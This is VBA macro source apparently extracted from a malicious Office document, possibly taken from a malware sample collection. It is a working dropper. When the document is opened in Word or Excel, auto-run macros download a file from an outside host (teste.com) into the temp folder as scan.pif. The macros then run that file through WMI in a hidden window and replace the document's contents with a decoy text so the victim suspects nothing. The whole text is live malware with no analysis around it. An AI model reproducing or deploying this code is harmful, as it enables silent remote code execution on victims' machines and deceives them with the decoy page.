Attribute VB_Name = "NewMacros"
Public alreadyLaunched As Integer

Sub window_onload()
    Const impersonation = 3
    Const HIDDEN_WINDOW = 12

    Set Locator = CreateObject("WbemScripting.SWbemLocator")
    Set Service = Locator.ConnectServer()
    Service.Security_.ImpersonationLevel = impersonation

  
    Set objStartup = Service.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    objConfig.ShowWindow = HIDDEN_WINDOW
    Set filesys = CreateObject("Scripting.FileSystemObject")
    Set tempfolder = filesys.GetSpecialFolder(2)

    Set Process = Service.Get("Win32_Process")

    Error = Process.Create(tempfolder & "\scan.pif", Null, objConfig, intProcessID)

End Sub

Private Sub Malware()

    On Error Resume Next

    Set filesys = CreateObject("Scripting.FileSystemObject")
    Set tempfolder = filesys.GetSpecialFolder(2)

    Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
    Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
    xHttp.Open "GET", "http://teste.com/teste.txt", False
    xHttp.Send

    With bStrm
        .Type = 1 '//binary
            .Open
            .write xHttp.responseBody
            .savetofile tempfolder & "\scan.pif", 2 '//overwrite
    End With
    window_onload
End Sub


Private Sub Launch()

    On Error Resume Next

    If alreadyLaunched = True Then
        Exit Sub
    End If
    Malware
    SubstitutePage
    alreadyLaunched = True
End Sub

Private Sub SubstitutePage()
    '
    ' This routine will take the entire Document's contents,
    ' delete them and insert in their place contents defined in
    ' INSERT -> Quick Parts -> AutoText -> named as in `autoTextTemplateName`
    '
    Dim doc As Word.Document
    Dim firstPageRange As Range
    Dim rng As Range
    Dim autoTextTemplateName As String

    ' This is the name of the defined AutoText prepared in the document,
    ' to be inserted in place of previous contents.
    autoTextTemplateName = "RealDoc"

    Set firstPageRange = Word.ActiveDocument.Range
    firstPageRange.Select
    Selection.WholeStory
    Selection.Delete Unit:=wdCharacter, Count:=1

    Set doc = ActiveDocument
    Set rng = doc.Sections(1).Range
    doc.AttachedTemplate.AutoTextEntries(autoTextTemplateName).Insert rng, True
    doc.Save

End Sub

Sub AutoOpen()
    ' Becomes launched as first on MS Word
    Launch
End Sub

Sub Document_Open()
    ' Becomes launched as second, another try, on MS Word
    Launch
End Sub

Sub Auto_Open()
    ' Becomes launched as first on MS Excel
    Launch
End Sub
Sub Workbook_Open()
    Launch
End Sub

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


INQUEST-PP=macro
